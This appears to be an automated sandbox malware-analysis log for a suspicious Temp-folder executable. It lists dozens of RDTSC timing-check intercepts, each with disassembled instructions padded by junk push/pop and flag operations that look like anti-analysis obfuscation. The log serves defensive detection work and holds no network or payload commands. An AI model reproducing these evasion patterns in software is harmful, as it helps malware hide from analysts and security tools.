Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50F02 second address: 4B50F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50F06 second address: 4B50F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90EB7 second address: 4B90ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90ED2 second address: 4B90EF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F69D1080A59h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90EF4 second address: 4B90F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4AB52232h 0x00000008 mov bh, 2Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop esi 0x00000015 mov dh, 74h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90F0C second address: 4B90F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90F12 second address: 4B90F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B300A2 second address: 4B30100 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F69D1080A58h 0x00000008 sbb cx, 7478h 0x0000000d jmp 00007F69D1080A4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F69D1080A58h 0x0000001b add ch, FFFFFFD8h 0x0000001e jmp 00007F69D1080A4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30100 second address: 4B30112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30112 second address: 4B30119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30119 second address: 4B30138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F69D121AB35h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30138 second address: 4B3016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D1080A58h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3016B second address: 4B3017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3017A second address: 4B30192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A54h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30192 second address: 4B30196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50BA3 second address: 4B50BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50BA9 second address: 4B50BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50BAD second address: 4B50BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movzx ecx, dx 0x0000000d mov ah, dl 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F69D1080A54h 0x0000001a sub si, 76E8h 0x0000001f jmp 00007F69D1080A4Bh 0x00000024 popfd 0x00000025 push ecx 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50BEA second address: 4B50C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 0Ah 0x00000005 mov eax, 77543D73h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F69D121AB34h 0x00000015 adc ch, 00000078h 0x00000018 jmp 00007F69D121AB2Bh 0x0000001d popfd 0x0000001e mov si, CFAFh 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50C2A second address: 4B50C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50C2E second address: 4B50C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50819 second address: 4B5089F instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 4A3A231Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F69D1080A4Fh 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F69D1080A54h 0x00000017 add esi, 221FB118h 0x0000001d jmp 00007F69D1080A4Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F69D1080A58h 0x00000029 xor si, 9B78h 0x0000002e jmp 00007F69D1080A4Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F69D1080A55h 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5089F second address: 4B508AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB2Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B508AF second address: 4B508C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov dl, 80h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B506FB second address: 4B506FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B506FF second address: 4B50705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50705 second address: 4B5071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB36h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5071F second address: 4B5073A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov esi, 72953AC1h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5073A second address: 4B507BF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F69D121AB2Eh 0x00000008 sbb ecx, 16C6A2D8h 0x0000000e jmp 00007F69D121AB2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F69D121AB38h 0x0000001b pushfd 0x0000001c jmp 00007F69D121AB32h 0x00000021 jmp 00007F69D121AB35h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov dx, si 0x00000030 call 00007F69D121AB34h 0x00000035 pop esi 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B507BF second address: 4B507C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B507C5 second address: 4B507C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B507C9 second address: 4B507CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5042A second address: 4B5042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5042E second address: 4B50434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50434 second address: 4B5045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D121AB2Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5045D second address: 4B504A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F69D1080A57h 0x00000008 pop ecx 0x00000009 call 00007F69D1080A59h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F69D1080A4Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B504A3 second address: 4B504A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B504A9 second address: 4B504AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B504AD second address: 4B504B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B601E3 second address: 4B601FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A58h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B601FF second address: 4B6022A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F69D121AB2Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F69D121AB2Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 mov edx, esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90E4C second address: 4B90E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90E52 second address: 4B90E8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F69D121AB30h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F69D121AB37h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90E8E second address: 4B90E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90E94 second address: 4B90E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B704B6 second address: 4B704BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B704BB second address: 4B70528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB34h 0x00000009 add ax, DBC8h 0x0000000e jmp 00007F69D121AB2Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F69D121AB38h 0x0000001a or si, DE28h 0x0000001f jmp 00007F69D121AB2Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 and dword ptr [eax], 00000000h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F69D121AB30h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70528 second address: 4B70537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70537 second address: 4B7053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B7053E second address: 4B70566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax+04h], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D1080A59h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70566 second address: 4B7056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5058B second address: 4B505C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F69D1080A4Dh 0x00000013 jmp 00007F69D1080A4Bh 0x00000018 popfd 0x00000019 push esi 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B505C8 second address: 4B5062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB2Bh 0x00000009 sbb cx, B72Eh 0x0000000e jmp 00007F69D121AB39h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F69D121AB2Dh 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F69D121AB2Ch 0x00000027 sbb ax, 0FD8h 0x0000002c jmp 00007F69D121AB2Bh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 mov edx, ecx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B5062D second address: 4B50651 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D1080A58h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50651 second address: 4B50675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007F69D121AB2Dh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 14C61A4Fh 0x00000018 mov dx, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B60EA2 second address: 4B60EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F69D1080A4Fh 0x00000008 pop ecx 0x00000009 mov si, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, ecx 0x00000015 push eax 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70222 second address: 4B70228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70228 second address: 4B7022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B7022C second address: 4B7025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D121AB2Ch 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B7025A second address: 4B7029C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F69D1080A56h 0x0000001c sbb eax, 5B45EA88h 0x00000022 jmp 00007F69D1080A4Bh 0x00000027 popfd 0x00000028 mov ch, 02h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B7029C second address: 4B702C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D121AB2Ah 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B702C2 second address: 4B702C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B702C6 second address: 4B702CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90679 second address: 4B9067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B9067D second address: 4B90683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90683 second address: 4B9068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 48h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B9068A second address: 4B906AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F69D121AB2Ah 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f mov bx, 9870h 0x00000013 popad 0x00000014 mov eax, dword ptr [76FB65FCh] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B906AE second address: 4B906B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B906B4 second address: 4B90711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c jmp 00007F69D121AB31h 0x00000011 je 00007F6A435BDDBBh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F69D121AB33h 0x00000020 add ecx, 7BA5C72Eh 0x00000026 jmp 00007F69D121AB39h 0x0000002b popfd 0x0000002c mov edi, eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90711 second address: 4B9072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A58h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B9072D second address: 4B9078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b mov ch, dl 0x0000000d push esi 0x0000000e movsx edi, si 0x00000011 pop eax 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F69D121AB38h 0x0000001d adc ecx, 27135168h 0x00000023 jmp 00007F69D121AB2Bh 0x00000028 popfd 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d and ecx, 1Fh 0x00000030 pushad 0x00000031 mov dx, B244h 0x00000035 push edi 0x00000036 mov ecx, 392CEA4Fh 0x0000003b pop eax 0x0000003c popad 0x0000003d ror eax, cl 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov dx, si 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B9078E second address: 4B90794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90794 second address: 4B90798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B90798 second address: 4B907F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00512014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007F69D5741222h 0x0000002c push FFFFFFFEh 0x0000002e jmp 00007F69D1080A57h 0x00000033 pop eax 0x00000034 pushad 0x00000035 mov bx, si 0x00000038 movzx esi, dx 0x0000003b popad 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f call 00007F69D574123Eh 0x00000044 mov edi, edi 0x00000046 pushad 0x00000047 movsx edi, ax 0x0000004a mov ah, 05h 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F69D1080A59h 0x00000055 rdtsc
